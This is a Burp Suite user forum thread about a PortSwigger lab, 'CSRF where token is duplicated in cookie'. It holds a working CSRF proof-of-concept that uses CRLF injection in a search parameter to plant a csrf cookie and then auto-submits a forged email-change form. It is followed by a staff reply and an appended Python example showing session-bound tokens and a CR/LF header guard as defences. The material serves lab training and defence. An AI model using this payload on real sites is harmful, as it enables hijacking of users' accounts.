The Burp Suite User Forum will be discontinued on the 1st November 2024.

Burp Suite User Forum


Cannot solve lab "CSRF where token is duplicated in cookie"

HieuNgTe | Last updated: Jan 05, 2024 04:50PM UTC

I cannot solve lab "CSRF where token is duplicated in cookie". This is my CSRF PoC:

    <html>
      <!-- CSRF PoC - generated by Burp Suite Professional -->
      <body>
        <script>history.pushState('', '', '/')</script>
        <form action="https://0a310063031c4c6282ee29fc0064006f.web-security-academy.net/my-account/change-email" method="POST">
          <input type="hidden" name="email" value="wiener&#64;normal&#45;user&#46;net" />
          <input type="hidden" name="csrf" value="csrftest" />
          <input type="submit" value="Submit request" />
        </form>
        <img src="https://0a310063031c4c6282ee29fc0064006f.web-security-academy.net/?search=test%0d%0aSet-Cookie:csrf=csrftest%3b%20SameSite=None" onerror="document.forms[0].submit();"/>
      </body>
    </html>

Ben, PortSwigger Agent | Last updated: Jan 08, 2024 11:26AM UTC

Hi Nguyễn, Your exploit appears to work when I use it. Have you previously used the 'View exploit' functionality to test the exploit on your own account? If so, you would need to alter the email address in the exploit as, as noted in the Hint shown in the lab, two users cannot have the same email address associated with them.
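The PoC in the question works because the lab's "double submit" check only compares the csrf form field with the csrf cookie, and a CRLF injection through the reflected search parameter lets the attacker plant that cookie. The following is an added example, not code from the thread or from PortSwigger's lab: it replays the PoC's cookie/form pair against the weak check and against a session-bound variant, and shows the header-value guard that would have closed the cookie-planting path. The server key, session id and request values are constructed for the example.

```python
import hmac
import hashlib

# Constructed server-side key for this example only; a real deployment loads
# it from configuration rather than hard-coding it.
SERVER_KEY = b"constructed-example-key"

# Constructed sample mirroring the PoC above: the victim's own session cookie,
# the attacker-planted csrf cookie, and the attacker-chosen csrf form field.
ATTACKER_REQUEST = {
    "session_id": "victim-session-id",
    "cookie_csrf": "csrftest",
    "form_csrf": "csrftest",
}

def naive_double_submit_ok(cookie_csrf: str, form_csrf: str) -> bool:
    """The weak check: the form token only has to equal the cookie token, so any
    attacker who can set the cookie also controls the expected value."""
    return bool(cookie_csrf) and hmac.compare_digest(cookie_csrf, form_csrf)

def session_bound_token(session_id: str) -> str:
    """Hardened variant: derive the CSRF token from the session id under a
    server-side key, so a planted cookie cannot match without that key."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()

def session_bound_ok(session_id: str, cookie_csrf: str, form_csrf: str) -> bool:
    expected = session_bound_token(session_id)
    return (hmac.compare_digest(expected, cookie_csrf)
            and hmac.compare_digest(expected, form_csrf))

def safe_header_value(value: str) -> str:
    """Guard for user input reflected into a response header: reject CR/LF so a
    ?search= value cannot append a Set-Cookie line, as the PoC's <img> URL does."""
    if "\r" in value or "\n" in value:
        raise ValueError("CR/LF in header value rejected")
    return value

def evaluate(req: dict) -> dict:
    """Run both checks over the same request and report which would accept it."""
    return {
        "naive_accepts": naive_double_submit_ok(req["cookie_csrf"], req["form_csrf"]),
        "bound_accepts": session_bound_ok(req["session_id"],
                                          req["cookie_csrf"], req["form_csrf"]),
    }

if __name__ == "__main__":
    print(evaluate(ATTACKER_REQUEST))  # {'naive_accepts': True, 'bound_accepts': False}
```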
